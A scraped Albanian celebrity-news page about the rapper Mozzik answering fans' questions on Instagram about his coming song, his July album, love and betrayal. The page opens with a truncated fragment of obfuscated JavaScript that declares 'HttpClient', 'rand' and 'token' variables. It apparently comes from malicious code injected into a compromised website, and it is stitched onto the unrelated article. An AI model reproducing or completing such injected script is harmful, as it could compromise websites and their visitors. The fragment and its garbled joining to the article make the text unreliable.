;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Nga karriera tek tradhëtia e dashuria, Mozzik flet për të gjitha!

By

Reperi Mozzik ka vendosur që t’i hapë letrat duke iu përgjigjur shumë pyetjeve të fansave mbrëmjen e kaluar.

Në Instagram, ai zbuloi më shumë nga karriera por edhe jeta private e familja.

Reperi ka zbuluar se këtë muaj vjen një këngë e re në shqip teksa albumi do të publikohet i plotë muajin pasues, në korrik.

Nuk munguan pyetjet as mbi jetën private të cilat mund të lidhen me zhvillimet e vetë Mozzik.

I pyetur se a mund të dashurojë një mashkull për herë të dytë, reperi u përgjigj: “Një mashkull mund të dashurojë sa herë të do vetë”. Gjithashtu, mbi njerëzit që tradhëtojnë, Mozzik është shprehur në bashkëbisedimin me fansat se ata “tradhëtojnë veten”.

Reperi i njohur nuk ka mbetur as pa e definuar dashurinë që sipas tij është “një këmbë në ujë, një këmbë në zjarr”.

Mos na zbuloi të gjitha? Me transparencën e tij, Mozzik duket se nuk i la hapësirë pikëpyetjeve. /prive.al

Artikuj të ngjashëm